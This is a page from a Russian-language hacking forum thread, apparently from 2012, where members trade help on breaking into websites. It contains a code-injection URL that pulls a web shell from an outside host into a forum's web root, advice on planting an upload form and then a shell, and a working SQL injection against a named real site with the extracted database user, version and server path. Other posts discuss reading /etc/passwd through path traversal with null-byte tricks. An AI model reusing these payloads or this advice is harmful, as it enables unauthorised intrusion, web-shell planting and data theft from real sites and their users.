HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1940 из 2438 « Первая < 9401440184018901930 1936 1937 1938 1939 1940 1941 1942 1943 1944 195019902040 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #19391  
Старый 28.01.2012, 10:36
Чакэ
Guest
Сообщений: n/a
Провел на форуме:
90728

Репутация: 62
По умолчанию
Цитата:
Сообщение от Brain_Enable  
Brain_Enable said:
Не работает. После того как скопировал, пробелы(которые форум добавляет) естественно убрал
Почему названия столбцов разделяются двоеточием, а не запятой?
Вы сами пробовали этот код?
товарисч, иди кури маны. тоже мне хацкир..
 
Ответить с цитированием

  #19392  
Старый 28.01.2012, 10:39
Чакэ
Guest
Сообщений: n/a
Провел на форуме:
90728

Репутация: 62
По умолчанию
Цитата:
Сообщение от justonline  
justonline said:
есть где почитать подробнее про заливку шела через картинку?
просто загнать шелл.пхп не получается..сначало резало js...потом я скрипт этот выпилил и теперь режет с серверной стороны.
переименовал шелл в шелл.пхп.жпг, получил в аватарку себе -

жду советов
/thread312513.html
 
Ответить с цитированием

  #19393  
Старый 28.01.2012, 15:14
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
В такой ситуации как залить шелл, или это безнадежно?

Я, понимаю, здесь запрещен инклуд и форум пропатчен, или я не прав?

http://www.site.com/forum/profile.php?mode=editprofile&bb=copy($_GET[file1],$_GET[file2]);&file1=http://web.ru/shell.txt&file2=/home/data/www/public_html/forum/shell.php

Warning: copy() [function.copy]: URL file-access is disabled in the server configuration in /home/data/www/public_html/forum/includes/usercp_register.php(888) : regexp code(1) : eval()'d code on line 1
 
Ответить с цитированием

  #19394  
Старый 28.01.2012, 15:20
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от er9j6@  
er9j6@ said:
В такой ситуации как залить шелл, или это безнадежно?
Я, понимаю, здесь запрещен инклуд и форум пропатчен, или я не прав?
http://www.site.com/forum/profile.php?mode=editprofile&bb=copy($_GET[file1],$_GET[file2]);&file1=http://web.ru/shell.txt&file2=/home/data/www/public_html/forum/shell.php
Warning: copy() [function.copy]: URL file-access is disabled in the server configuration in /home/data/www/public_html/forum/includes/usercp_register.php(888) : regexp code(1) : eval()'d code on line 1
через file_put_contents залей форму upload а, дальше шелл..
 
Ответить с цитированием

  #19395  
Старый 29.01.2012, 12:13
ReckouNT
Новичок
Регистрация: 16.01.2009
Сообщений: 17
Провел на форуме:
31738

Репутация: 2
По умолчанию
Как заливать шеллы, используя плохую настройку .htaccess?
 
Ответить с цитированием

  #19396  
Старый 29.01.2012, 12:31
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от ReckouNT  
ReckouNT said:
Как заливать шеллы, используя плохую настройку .htaccess?
А по точнее? Например, если льеш файл .php, а он через скрипт ренеймится в 4341843438121354131_file.php, можно полистать папки

Цитата:
Сообщение от None  
используя плохую настройку .htaccess
.
 
Ответить с цитированием

  #19397  
Старый 29.01.2012, 18:33
bodrich
Guest
Сообщений: n/a
Провел на форуме:
5709

Репутация: 0
По умолчанию
http://reshuege.ru/test?theme=2'))+and+(('1'='1 - возможно ли здесь стянуть что либо ? Просто параметр проходит через функцию int(), и поэтому результат не увидеть (
 
Ответить с цитированием

  #19398  
Старый 29.01.2012, 21:06
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию
такой вопрос, в пхп инъекции:

Warning: fopen(./books/chem/adams-r/1956-sbr-8/str/../../../../../../etc/passwd.str - это без нул байта

а вот это с нул байтом

Warning: fopen(./books/chem/adams-r/1956-sbr-8/str/../../../../../../etc/passwd\0.str)

вопрос как еще можно отрезать "0.str"?
 
Ответить с цитированием

  #19399  
Старый 29.01.2012, 21:07
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
2bodrich,

Код:
Code:
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--+f
Код:
Code:
root@localhost:problems:5.1.49-3
Full Path:

Код:
Code:
/var/www/reshuege.ru/
Вообщем можно много чего вытащить ^_^ Походу папка /psprav/

доступна на запись.

Цитата:
Сообщение от bodrich  
bodrich said:
http://reshuege.ru/test?theme=2'))+and+(('1'='1 - возможно ли здесь стянуть что либо ?
Просто параметр проходит через функцию int(), и поэтому результат не увидеть (
2pirat0,

4096 слешей пробуй.

UPD. Нет(
 
Ответить с цитированием

  #19400  
Старый 29.01.2012, 21:24
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию
2Ereee не канает, еще может какие то мысли?
 
Ответить с цитированием
Ответ
Страница 1940 из 2438 « Первая < 9401440184018901930 1936 1937 1938 1939 1940 1941 1942 1943 1944 195019902040 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ